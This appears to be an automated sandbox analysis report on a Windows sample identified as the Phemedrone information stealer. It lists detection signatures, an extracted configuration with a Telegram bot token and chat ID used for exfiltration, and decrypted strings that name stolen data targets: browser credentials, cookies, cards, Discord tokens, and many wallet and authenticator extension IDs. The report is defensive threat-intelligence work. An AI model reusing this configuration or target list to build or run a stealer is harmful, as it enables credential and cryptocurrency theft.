
Windows Analysis Report
Itaxyhi.exe

Overview

General Information

Sample name: Itaxyhi.exe
Analysis ID: 1572892
MD5: 78c586522f986994aa77c466c9d678a8
SHA1: 4b9b13c3782ae532a140a33ba673dc65a37aa882
SHA256: 498ac6b747691eb456fc24ac26c3932effca9b46e39740963120f711e72aefc9
Tags: exe user-lontze7
Infos:

Detection

Phemedrone Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
Yara detected Telegram RAT
.NET source code references suspicious native API functions
AI detected suspicious sample
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • Itaxyhi.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\Itaxyhi.exe" MD5: 78C586522F986994AA77C466C9D678A8)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendMessage?chat_id=7235624286", "Botnet": "Default", "Tag": "Itaxyhi", "RSA Key": "<?xml version=\"1.0\" ?>\r\n<RSAParameters xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n  <Exponent>AQAB</Exponent>\r\n  <Modulus>lcxyXmt8fdbjh92+uk/0LsBudoiTsIlP6MrwR4ojh2qcobQ+tbyJTPfK7unCHlHSPQpaFMCEAH8llB2KDNdl0Ynkw00bAeg9596b5eOgynVeqs9M3qOjCAKQJaHqWq/oKwHkVoxVa5wrr91eTDNw8y4PTO0rDEDiNbAnDs8F6wk=</Modulus>\r\n</RSAParameters>"}
{"C2 url": "https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendMessage"}
Source | Rule | Description | Author | Strings
00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GenericStealer_9 | Yara detected Generic Stealer | Joe Security |
00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
No Sigma rule has matched
No Suricata rule has matched



AV Detection

Source: Itaxyhi.exe | Malware Configuration Extractor: Phemedrone Stealer {"C2 url": "https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendMessage?chat_id=7235624286", "Botnet": "Default", "Tag": "Itaxyhi", "RSA Key": "<?xml version=\"1.0\" ?>\r\n<RSAParameters xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n <Exponent>AQAB</Exponent>\r\n <Modulus>lcxyXmt8fdbjh92+uk/0LsBudoiTsIlP6MrwR4ojh2qcobQ+tbyJTPfK7unCHlHSPQpaFMCEAH8llB2KDNdl0Ynkw00bAeg9596b5eOgynVeqs9M3qOjCAKQJaHqWq/oKwHkVoxVa5wrr91eTDNw8y4PTO0rDEDiNbAnDs8F6wk=</Modulus>\r\n</RSAParameters>"}
Source: Itaxyhi.exe.6504.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendMessage"}
Source: Itaxyhi.exe | ReversingLabs: Detection: 79%
Source: Itaxyhi.exe | Virustotal: Detection: 70%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Itaxyhi.exe | Joe Sandbox ML: detected
            Source: Itaxyhi.exeString decryptor: 7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM
            Source: Itaxyhi.exeString decryptor: 7235624286
            Source: Itaxyhi.exeString decryptor: <?xml version="1.0" ?><RSAParameters xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Exponent>AQAB</Exponent> <Modulus>lcxyXmt8fdbjh92+uk/0LsBudoiTsIlP6MrwR4ojh2qcobQ+tbyJTPfK7unCHlHSPQpaFMCEAH8llB2KDNdl0Ynkw00bAeg9596b5eOgynVeqs9M3qOjCAKQJaHqWq/oKwHkVoxVa5wrr91eTDNw8y4PTO0rDEDiNbAnDs8F6wk=</Modulus></RSAParameters>
            Source: Itaxyhi.exeString decryptor: Default
            Source: Itaxyhi.exeString decryptor: Itaxyhi
            Source: Itaxyhi.exeString decryptor: Memirybesohutifojyxifyloxaledoc
            Source: Itaxyhi.exeString decryptor: Passwords.txt
            Source: Itaxyhi.exeString decryptor:
            Source: Itaxyhi.exeString decryptor: Messengers/Discord/Tokens.txt
            Source: Itaxyhi.exeString decryptor:
            Source: Itaxyhi.exeString decryptor: Google Accounts/Tokens.txt
            Source: Itaxyhi.exeString decryptor: wallet.dat
            Source: Itaxyhi.exeString decryptor: Wallets/
            Source: Itaxyhi.exeString decryptor: \
            Source: Itaxyhi.exeString decryptor: Armory
            Source: Itaxyhi.exeString decryptor: Atomic
            Source: Itaxyhi.exeString decryptor: atomic\Local Storage\leveldb
            Source: Itaxyhi.exeString decryptor: Bytecoin
            Source: Itaxyhi.exeString decryptor: bytecoin
            Source: Itaxyhi.exeString decryptor: Coninomi
            Source: Itaxyhi.exeString decryptor: Coinomi\Coinomi\wallets
            Source: Itaxyhi.exeString decryptor: Jaxx
            Source: Itaxyhi.exeString decryptor: com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
            Source: Itaxyhi.exeString decryptor: Electrum
            Source: Itaxyhi.exeString decryptor: Electrum\wallets
            Source: Itaxyhi.exeString decryptor: Exodus
            Source: Itaxyhi.exeString decryptor: Exodus\exodus.wallet
            Source: Itaxyhi.exeString decryptor: Guarda
            Source: Itaxyhi.exeString decryptor: Guarda\Local Storage\leveldb
            Source: Itaxyhi.exeString decryptor: ZCash
            Source: Itaxyhi.exeString decryptor: Zcash
            Source: Itaxyhi.exeString decryptor: /
            Source: Itaxyhi.exeString decryptor: FileZilla\recentservers.xml
            Source: Itaxyhi.exeString decryptor: FileZilla\sitemanager.xml
            Source: Itaxyhi.exeString decryptor: FileZilla\
            Source: Itaxyhi.exeString decryptor: FTP/
            Source: Itaxyhi.exeString decryptor: Profiles
            Source: Itaxyhi.exeString decryptor: key3.db
            Source: Itaxyhi.exeString decryptor: key4.db
            Source: Itaxyhi.exeString decryptor: cookies.sqlite
            Source: Itaxyhi.exeString decryptor: moz_cookies
            Source: Itaxyhi.exeString decryptor: formhistory.sqlite
            Source: Itaxyhi.exeString decryptor: moz_formhistory
            Source: Itaxyhi.exeString decryptor: Browser Data/
            Source: Itaxyhi.exeString decryptor: /Cookies[
            Source: Itaxyhi.exeString decryptor: ].txt
            Source: Itaxyhi.exeString decryptor:
            Source: Itaxyhi.exeString decryptor: /AutoFills[
            Source: Itaxyhi.exeString decryptor:
            Source: Itaxyhi.exeString decryptor: logins.json
            Source: Itaxyhi.exeString decryptor: encryptedUsername
            Source: Itaxyhi.exeString decryptor: encryptedPassword
            Source: Itaxyhi.exeString decryptor: hostname
            Source: Itaxyhi.exeString decryptor: [^ -]
            Source: Itaxyhi.exeString decryptor:
            Source: Itaxyhi.exeString decryptor: 1
            Source: Itaxyhi.exeString decryptor: metaData
            Source: Itaxyhi.exeString decryptor: password
            Source: Itaxyhi.exeString decryptor: 2A864886F70D010C050103
            Source: Itaxyhi.exeString decryptor: ISO-8859-1
            Source: Itaxyhi.exeString decryptor: password-check
            Source: Itaxyhi.exeString decryptor: 2A864886F70D01050D
            Source: Itaxyhi.exeString decryptor: nssPrivate
            Source: Itaxyhi.exeString decryptor: -
            Source: Itaxyhi.exeString decryptor: *.ini
            Source: Itaxyhi.exeString decryptor: global-salt
            Source: Itaxyhi.exeString decryptor: Version
            Source: Itaxyhi.exeString decryptor: User Data
            Source: Itaxyhi.exeString decryptor: 1.0.0.0
            Source: Itaxyhi.exeString decryptor: Local State
            Source: Itaxyhi.exeString decryptor: Network
            Source: Itaxyhi.exeString decryptor: Cookies
            Source: Itaxyhi.exeString decryptor: cookies
            Source: Itaxyhi.exeString decryptor: Web Data
            Source: Itaxyhi.exeString decryptor: autofill
            Source: Itaxyhi.exeString decryptor: Login Data
            Source: Itaxyhi.exeString decryptor: logins
            Source: Itaxyhi.exeString decryptor: token_service
            Source: Itaxyhi.exeString decryptor: credit_cards
            Source: Itaxyhi.exeString decryptor: Local Storage
            Source: Itaxyhi.exeString decryptor: leveldb
            Source: Itaxyhi.exeString decryptor: CreditCards.txt
            Source: Itaxyhi.exeString decryptor: Profile*
            Source: Itaxyhi.exeString decryptor: Authenticator
            Source: Itaxyhi.exeString decryptor: bhghoamapcdpbohphigoooaddinpkbai
            Source: Itaxyhi.exeString decryptor: EOS Authenticator
            Source: Itaxyhi.exeString decryptor: oeljdldpnmdbchonielidgobddffflal
            Source: Itaxyhi.exeString decryptor: BrowserPass
            Source: Itaxyhi.exeString decryptor: naepdomgkenhinolocfifgehidddafch
            Source: Itaxyhi.exeString decryptor: MYKI
            Source: Itaxyhi.exeString decryptor: bmikpgodpkclnkgmnpphehdgcimmided
            Source: Itaxyhi.exeString decryptor: Splikity
            Source: Itaxyhi.exeString decryptor: jhfjfclepacoldmjmkmdlmganfaalklb
            Source: Itaxyhi.exeString decryptor: CommonKey
            Source: Itaxyhi.exeString decryptor: chgfefjpcobfbnpmiokfjjaglahmnded
            Source: Itaxyhi.exeString decryptor: Zoho Vault
            Source: Itaxyhi.exeString decryptor: igkpcodhieompeloncfnbekccinhapdb
            Source: Itaxyhi.exeString decryptor: Norton Password Manager
            Source: Itaxyhi.exeString decryptor: admmjipmmciaobhojoghlmleefbicajg
            Source: Itaxyhi.exeString decryptor: Avira Password Manager
            Source: Itaxyhi.exeString decryptor: caljgklbbfbcjjanaijlacgncafpegll
            Source: Itaxyhi.exeString decryptor: Trezor Password Manager
            Source: Itaxyhi.exeString decryptor: imloifkgjagghnncjkhggdhalmcnfklk
            Source: Itaxyhi.exeString decryptor: MetaMask
            Source: Itaxyhi.exeString decryptor: nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: Itaxyhi.exeString decryptor: TronLink
            Source: Itaxyhi.exeString decryptor: ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: Itaxyhi.exeString decryptor: BinanceChain
            Source: Itaxyhi.exeString decryptor: fhbohimaelbohpjbbldcngcnapndodjp
            Source: Itaxyhi.exeString decryptor: Coin98
            Source: Itaxyhi.exeString decryptor: aeachknmefphepccionboohckonoeemg
            Source: Itaxyhi.exeString decryptor: iWallet
            Source: Itaxyhi.exeString decryptor: kncchdigobghenbbaddojjnnaogfppfj
            Source: Itaxyhi.exeString decryptor: Wombat
            Source: Itaxyhi.exeString decryptor: amkmjjmmflddogmhpjloimipbofnfjih
            Source: Itaxyhi.exeString decryptor: NeoLine
            Source: Itaxyhi.exeString decryptor: cphhlgmgameodnhkjdmkpanlelnlohao
            Source: Itaxyhi.exeString decryptor: Terra Station
            Source: Itaxyhi.exeString decryptor: aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: Itaxyhi.exeString decryptor: Keplr
            Source: Itaxyhi.exeString decryptor: dmkamcknogkgcdfhhbddcghachkejeap
            Source: Itaxyhi.exeString decryptor: Sollet
            Source: Itaxyhi.exeString decryptor: fhmfendgdocmcbmfikdcogofphimnkno
            Source: Itaxyhi.exeString decryptor: ICONex
            Source: Itaxyhi.exeString decryptor: flpiciilemghbmfalicajoolhkkenfel
            Source: Itaxyhi.exeString decryptor: KHC
            Source: Itaxyhi.exeString decryptor: hcflpincpppdclinealmandijcmnkbgn
            Source: Itaxyhi.exeString decryptor: TezBox
            Source: Itaxyhi.exeString decryptor: mnfifefkajgofkcjkemidiaecocnkjeh
            Source: Itaxyhi.exeString decryptor: Byone
            Source: Itaxyhi.exeString decryptor: nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: Itaxyhi.exeString decryptor: OneKey
            Source: Itaxyhi.exeString decryptor: ilbbpajmiplgpehdikmejfemfklpkmke
            Source: Itaxyhi.exeString decryptor: Trust Wallets
            Source: Itaxyhi.exeString decryptor: pknlccmneadmjbkollckpblgaaabameg
            Source: Itaxyhi.exeString decryptor: MetaWallet
            Source: Itaxyhi.exeString decryptor: pfknkoocfefiocadajpngdknmkjgakdg
            Source: Itaxyhi.exeString decryptor: Guarda Wallet
            Source: Itaxyhi.exeString decryptor: fcglfhcjfpkgdppjbglknafgfffkelnm
            Source: Itaxyhi.exeString decryptor: idkppnahnmmggbmfkjhiakkbkdpnmnon
            Source: Itaxyhi.exeString decryptor: JaxxxLiberty
            Source: Itaxyhi.exeString decryptor: mhonjhhcgphdphdjcdoeodfdliikapmj
            Source: Itaxyhi.exeString decryptor: Atomic Wallet
            Source: Itaxyhi.exeString decryptor: bhmlbgebokamljgnceonbncdofmmkedg
            Source: Itaxyhi.exeString decryptor: hieplnfojfccegoloniefimmbfjdgcgp
            Source: Itaxyhi.exeString decryptor: Mycelium
            Source: Itaxyhi.exeString decryptor: pidhddgciaponoajdngciiemcflpnnbg
            Source: Itaxyhi.exeString decryptor: Coinomi
            Source: Itaxyhi.exeString decryptor: blbpgcogcoohhngdjafgpoagcilicpjh
            Source: Itaxyhi.exeString decryptor: GreenAddress
            Source: Itaxyhi.exeString decryptor: gflpckpfdgcagnbdfafmibcmkadnlhpj
            Source: Itaxyhi.exeString decryptor: Edge
            Source: Itaxyhi.exeString decryptor: doljkehcfhidippihgakcihcmnknlphh
            Source: Itaxyhi.exeString decryptor: BRD
            Source: Itaxyhi.exeString decryptor: nbokbjkelpmlgflobbohapifnnenbjlh
            Source: Itaxyhi.exeString decryptor: Samourai Wallet
            Source: Itaxyhi.exeString decryptor: apjdnokplgcjkejimjdfjnhmjlbpgkdi
            Source: Itaxyhi.exeString decryptor: Copay
            Source: Itaxyhi.exeString decryptor: ieedgmmkpkbiblijbbldefkomatsuahh
            Source: Itaxyhi.exeString decryptor: Bread
            Source: Itaxyhi.exeString decryptor: jifanbgejlbcmhbbdbnfbfnlmbomjedj
            Source: Itaxyhi.exeString decryptor: KeepKey
            Source: Itaxyhi.exeString decryptor: dojmlmceifkfgkgeejemfciibjehhdcl
            Source: Itaxyhi.exeString decryptor: Trezor
            Source: Itaxyhi.exeString decryptor: jpxupxjxheguvfyhfhahqvxvyqthiryh
            Source: Itaxyhi.exeString decryptor: Ledger Live
            Source: Itaxyhi.exeString decryptor: pfkcfdjnlfjcmkjnhcbfhfkkoflnhjln
            Source: Itaxyhi.exeString decryptor: Ledger Wallet
            Source: Itaxyhi.exeString decryptor: hbpfjlflhnmkddbjdchbbifhllgmmhnm
            Source: Itaxyhi.exeString decryptor: Bitbox
            Source: Itaxyhi.exeString decryptor: ocmfilhakdbncmojmlbagpkjfbmeinbd
            Source: Itaxyhi.exeString decryptor: Digital Bitbox
            Source: Itaxyhi.exeString decryptor: dbhklojmlkgmpihhdooibnmidfpeaing
            Source: Itaxyhi.exeString decryptor: YubiKey
            Source: Itaxyhi.exeString decryptor: mammpjaaoinfelloncbbpomjcihbkmmc
            Source: Itaxyhi.exeString decryptor: Google Authenticator
            Source: Itaxyhi.exeString decryptor: khcodhlfkpmhibicdjjblnkgimdepgnd
            Source: Itaxyhi.exeString decryptor: Microsoft Authenticator
            Source: Itaxyhi.exeString decryptor: bfbdnbpibgndpjfhonkflpkijfapmomn
            Source: Itaxyhi.exeString decryptor: Authy
            Source: Itaxyhi.exeString decryptor: gjffdbjndmcafeoehgdldobgjmlepcal
            Source: Itaxyhi.exeString decryptor: Duo Mobile
            Source: Itaxyhi.exeString decryptor: eidlicjlkaiefdbgmdepmmicpbggmhoj
            Source: Itaxyhi.exeString decryptor: OTP Auth
            Source: Itaxyhi.exeString decryptor: bobfejfdlhnabgglompioclndjejolch
            Source: Itaxyhi.exeString decryptor: FreeOTP
            Source: Itaxyhi.exeString decryptor: elokfmmmjbadpgdjmgglocapdckdcpkn
            Source: Itaxyhi.exeString decryptor: Aegis Authenticator
            Source: Itaxyhi.exeString decryptor: ppdjlkfkedmidmclhakfncpfdmdgmjpm
            Source: Itaxyhi.exeString decryptor: LastPass Authenticator
            Source: Itaxyhi.exeString decryptor: cfoajccjibkjhbdjnpkbananbejpkkjb
            Source: Itaxyhi.exeString decryptor: Dashlane
            Source: Itaxyhi.exeString decryptor: flikjlpgnpcjdienoojmgliechmmheek
            Source: Itaxyhi.exeString decryptor: Keeper
            Source: Itaxyhi.exeString decryptor: gofhklgdnbnpcdigdgkgfobhhghjmmkj
            Source: Itaxyhi.exeString decryptor: RoboForm
            Source: Itaxyhi.exeString decryptor: hppmchachflomkejbhofobganapojjol
            Source: Itaxyhi.exeString decryptor: KeePass
            Source: Itaxyhi.exeString decryptor: lbfeahdfdkibininjgejjgpdafeopflb
            Source: Itaxyhi.exeString decryptor: KeePassXC
            Source: Itaxyhi.exeString decryptor: kgeohlebpjgcfiidfhhdlnnkhefajmca
            Source: Itaxyhi.exeString decryptor: Bitwarden
            Source: Itaxyhi.exeString decryptor: inljaljiffkdgmlndjkdiepghpolcpki
            Source: Itaxyhi.exeString decryptor: NordPass
            Source: Itaxyhi.exeString decryptor: njgnlkhcjgmjfnfahdmfkalpjcneebpl
            Source: Itaxyhi.exeString decryptor: LastPass
            Source: Itaxyhi.exeString decryptor: gabedfkgnbglfbnplfpjddgfnbibkmbb
            Source: Itaxyhi.exeString decryptor: Nifty Wallet
            Source: Itaxyhi.exeString decryptor: jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: Itaxyhi.exeString decryptor: Math Wallet
            Source: Itaxyhi.exeString decryptor: afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: Itaxyhi.exeString decryptor: Coinbase Wallet
            Source: Itaxyhi.exeString decryptor: hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: Itaxyhi.exeString decryptor: Equal Wallet
            Source: Itaxyhi.exeString decryptor: blnieiiffboillknjnepogjhkgnoac
            Source: Itaxyhi.exeString decryptor: EVER Wallet
            Source: Itaxyhi.exeString decryptor: cgeeodpfagjceefieflmdfphplkenlfk
            Source: Itaxyhi.exeString decryptor: Jaxx Liberty
            Source: Itaxyhi.exeString decryptor: ocefimbphcgjaahbclemolcmkeanoagc
            Source: Itaxyhi.exeString decryptor: BitApp Wallet
            Source: Itaxyhi.exeString decryptor: fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: Itaxyhi.exeString decryptor: Mew CX
            Source: Itaxyhi.exeString decryptor: nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: Itaxyhi.exeString decryptor: GU Wallet
            Source: Itaxyhi.exeString decryptor: nfinomegcaccbhchhgflladpfbajihdf
            Source: Itaxyhi.exeString decryptor: Guild Wallet
            Source: Itaxyhi.exeString decryptor: nanjmdkhkinifnkgdeggcnhdaammmj
            Source: Itaxyhi.exeString decryptor: Saturn Wallet
            Source: Itaxyhi.exeString decryptor: nkddgncdjgifcddamgcmfnlhccnimig
            Source: Itaxyhi.exeString decryptor: Harmony Wallet
            Source: Itaxyhi.exeString decryptor: fnnegphlobjdpkhecapkijjdkgcjhkib
            Source: Itaxyhi.exeString decryptor: TON Wallet
            Source: Itaxyhi.exeString decryptor: nphplpgoakhhjchkkhmiggakijnkhfnd
            Source: Itaxyhi.exeString decryptor: OpenMask Wallet
            Source: Itaxyhi.exeString decryptor: penjlddjkjgpnkllboccdgccekpkcbin
            Source: Itaxyhi.exeString decryptor: MyTonWallet
            Source: Itaxyhi.exeString decryptor: fldfpgipfncgndfolcbkdeeknbbbnhcc
            Source: Itaxyhi.exeString decryptor: DeWallet
            Source: Itaxyhi.exeString decryptor: pnccjgokhbnggghddhahcnaopgeipafg
            Source: Itaxyhi.exeString decryptor: TrustWallet
            Source: Itaxyhi.exeString decryptor: egjidjbpglichdcondbcbdnbeeppgdph
            Source: Itaxyhi.exeString decryptor: NC Wallet
            Source: Itaxyhi.exeString decryptor: imlcamfeniaidioeflifonfjeeppblda
            Source: Itaxyhi.exeString decryptor: Moso Wallet
            Source: Itaxyhi.exeString decryptor: ajkifnllfhikkjbjopkhmjoieikeihjb
            Source: Itaxyhi.exeString decryptor: Enkrypt Wallet
            Source: Itaxyhi.exeString decryptor: kkpllkodjeloidieedojogacfhpaihoh
            Source: Itaxyhi.exeString decryptor: CirusWeb3 Wallet
            Source: Itaxyhi.exeString decryptor: kgdijkcfiglijhaglibaidbipiejjfdp
            Source: Itaxyhi.exeString decryptor: Martian and Sui Wallet
            Source: Itaxyhi.exeString decryptor: efbglgofoippbgcjepnhiblaibcnclgk
            Source: Itaxyhi.exeString decryptor: SubWallet
            Source: Itaxyhi.exeString decryptor: onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: Itaxyhi.exeString decryptor: Pontem Wallet
            Source: Itaxyhi.exeString decryptor: phkbamefinggmakgklpkljjmgibohnba
            Source: Itaxyhi.exeString decryptor: Talisman Wallet
            Source: Itaxyhi.exeString decryptor: fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: Itaxyhi.exeString decryptor: Kardiachain Wallet
            Source: Itaxyhi.exeString decryptor: pdadjkfkgcafgbceimcpbkalnfnepbnk
            Source: Itaxyhi.exeString decryptor: Phantom Wallet
            Source: Itaxyhi.exeString decryptor: bfnaelmomeimhIpmgjnjophhpkkoljpa
            Source: Itaxyhi.exeString decryptor: Oxygen Wallet
            Source: Itaxyhi.exeString decryptor: fhilaheimglignddjgofkcbgekhenbh
            Source: Itaxyhi.exeString decryptor: PaliWallet
            Source: Itaxyhi.exeString decryptor: mgfffbidihjpoaomajlbgchddlicgpn
            Source: Itaxyhi.exeString decryptor: BoltX Wallet
            Source: Itaxyhi.exeString decryptor: aodkkagnadcbobfpggnjeongemjbjca
            Source: Itaxyhi.exeString decryptor: Liquality Wallet
            Source: Itaxyhi.exeString decryptor: kpopkelmapcoipemfendmdghnegimn
            Source: Itaxyhi.exeString decryptor: xDefi Wallet
            Source: Itaxyhi.exeString decryptor: hmeobnffcmdkdcmlb1gagmfpfboieaf
            Source: Itaxyhi.exeString decryptor: Nami Wallet
            Source: Itaxyhi.exeString decryptor: Ipfcbjknijpeeillifnkikgncikgfhdo
            Source: Itaxyhi.exeString decryptor: MaiarDeFi Wallet
            Source: Itaxyhi.exeString decryptor: dngmlblcodfobpdpecaadgfbeggfjfnm
            Source: Itaxyhi.exeString decryptor: MetaMask Edge Wallet
            Source: Itaxyhi.exeString decryptor: ejbalbakoplchlghecdalmeeeajnimhm
            Source: Itaxyhi.exeString decryptor: Goblin Wallet
            Source: Itaxyhi.exeString decryptor: mlbafbjadjidk1bhgopoamemfibcpdfi
            Source: Itaxyhi.exeString decryptor: Braavos Smart Wallet
            Source: Itaxyhi.exeString decryptor: jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: Itaxyhi.exeString decryptor: UniSat Wallet
            Source: Itaxyhi.exeString decryptor: ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: Itaxyhi.exeString decryptor: OKX Wallet
            Source: Itaxyhi.exeString decryptor: mcohilncbfahbmgdjkbpemcciiolgcge
            Source: Itaxyhi.exeString decryptor: Manta Wallet
            Source: Itaxyhi.exeString decryptor: enabgbdfcbaehmbigakijjabdpdnimlg
            Source: Itaxyhi.exeString decryptor: Suku Wallet
            Source: Itaxyhi.exeString decryptor: fopmedgnkfpebgllppeddmmochcookhc
            Source: Itaxyhi.exeString decryptor: Suiet Wallet
            Source: Itaxyhi.exeString decryptor: khpkpbbcccdmmclmpigdgddabeilkdpd
            Source: Itaxyhi.exeString decryptor: Koala Wallet
            Source: Itaxyhi.exeString decryptor: lnnnmfcpbkafcpgdilckhmhbkkbpkmid
            Source: Itaxyhi.exeString decryptor: ExodusWeb3 Wallet
            Source: Itaxyhi.exeString decryptor: aholpfdialjgjfhomihkjbmgjidlcdno
            Source: Itaxyhi.exeString decryptor: Aurox Wallet
            Source: Itaxyhi.exeString decryptor: kilnpioakcdndlodeeceffgjdpojajlo
            Source: Itaxyhi.exeString decryptor: Fewcha Move Wallet
            Source: Itaxyhi.exeString decryptor: ebfidpplhabeedpnhjnobghokpiioolj
            Source: Itaxyhi.exeString decryptor: Carax Demon Wallet
            Source: Itaxyhi.exeString decryptor: mdjmfdffdcmnoblignmgpommbefadffd
            Source: Itaxyhi.exeString decryptor: Leap Terra Wallet
            Source: Itaxyhi.exeString decryptor: aijcbedoijmgnlmjeegjaglmepbmpkpi
            Source: Itaxyhi.exeString decryptor: Local Extension Settings
            Source: Itaxyhi.exeString decryptor: Extensions/
            Source: Itaxyhi.exeString decryptor: [
            Source: Itaxyhi.exeString decryptor: ]/
            Source: Itaxyhi.exeString decryptor: Module Info Cache
            Source: Itaxyhi.exeString decryptor: Last Version
            Source: Itaxyhi.exeString decryptor: .
            Source: Itaxyhi.exeString decryptor: *cord*
            Source: Itaxyhi.exeString decryptor: FileGrabber
            Source: Itaxyhi.exeString decryptor: ,d88b.d88b, 88888888888 Phemedrone Stealer `Y8888888Y' {0:dd/MM/yyyy HH:mm:ss} `Y888Y' Developed by https://t.me/webster480 & https://t.me/TheDyer `Y' Tag: {1} ----- Geolocation Data -----{2,-25}{3}{4,-25}{5} ({6}){7,-25}{8}{9,-25}{10}{11,-25}{12} ----- Hardware Info -----{13,-25}{14}\{15} {16,-25}{17} {18}{19,-25}{20}{21,-25}{22}{23,-25}{24}{25,-25}{26}{27,-25}{28} GB ----- Report Contents -----{29,-25}{30}{31,-25}{32}{33,-25}{34}{35,-25}{36}{37,-25}{38}{39,-25}{40}{41,-25}{42}{43}{44} ----- Miscellaneous -----{45,-25}{46}{47,-25}{48}
            Source: Itaxyhi.exeString decryptor: IP:
            Source: Itaxyhi.exeString decryptor: ip
            Source: Itaxyhi.exeString decryptor: Country:
            Source: Itaxyhi.exeString decryptor: country
            Source: Itaxyhi.exeString decryptor: country_code
            Source: Itaxyhi.exeString decryptor: City:
            Source: Itaxyhi.exeString decryptor: city
            Source: Itaxyhi.exeString decryptor: Postal:
            Source: Itaxyhi.exeString decryptor: asn
            Source: Itaxyhi.exeString decryptor: MAC:
            Source: Itaxyhi.exeString decryptor: Username:
            Source: Itaxyhi.exeString decryptor: Windows name:
            Source: Itaxyhi.exeString decryptor: x32
            Source: Itaxyhi.exeString decryptor: x64
            Source: Itaxyhi.exeString decryptor: Hardware ID:
            Source: Itaxyhi.exeString decryptor: Screen Resolution:
            Source: Itaxyhi.exeString decryptor: GPU:
            Source: Itaxyhi.exeString decryptor: {0,-25}
            Source: Itaxyhi.exeString decryptor: CPU:
            Source: Itaxyhi.exeString decryptor: RAM:
            Source: Itaxyhi.exeString decryptor: Passwords:
            Source: Itaxyhi.exeString decryptor: Cookies:
            Source: Itaxyhi.exeString decryptor: Credit Cards:
            Source: Itaxyhi.exeString decryptor: AutoFills:
            Source: Itaxyhi.exeString decryptor: Extensions:
            Source: Itaxyhi.exeString decryptor: Wallets:
            Source: Itaxyhi.exeString decryptor: Files:
            Source: Itaxyhi.exeString decryptor: {0,-25}{1}
            Source: Itaxyhi.exeString decryptor: Passwords Tags:
            Source: Itaxyhi.exeString decryptor: ,
            Source: Itaxyhi.exeString decryptor: Cookies Tags:
            Source: Itaxyhi.exeString decryptor: Antivirus products:
            Source: Itaxyhi.exeString decryptor: File Location:
            Source: Itaxyhi.exeString decryptor: unknown
            Source: Itaxyhi.exeString decryptor: Information.txt
            Source: Itaxyhi.exe | String decryptor: *Phemedrone Stealer Report* \| by @webster480 & @TheDyer``` - IP: {0} \({1}\) - Tag: {2} {3} - Passwords: {4} - Cookies: {5} - Wallets: {6}```{7}{8}@freakcodingspot
            Source: Itaxyhi.exe | String decryptor: \.
            Source: Itaxyhi.exe | String decryptor: Unknown
            Source: Itaxyhi.exe | String decryptor: (
            Source: Itaxyhi.exe | String decryptor: )
            Source: Itaxyhi.exe | String decryptor: Passwords Tags:
            Source: Itaxyhi.exe | String decryptor: Cookies Tags:
            Source: Itaxyhi.exe | String decryptor: ]
            Source: Itaxyhi.exe | String decryptor: -Phemedrone-Report.zip
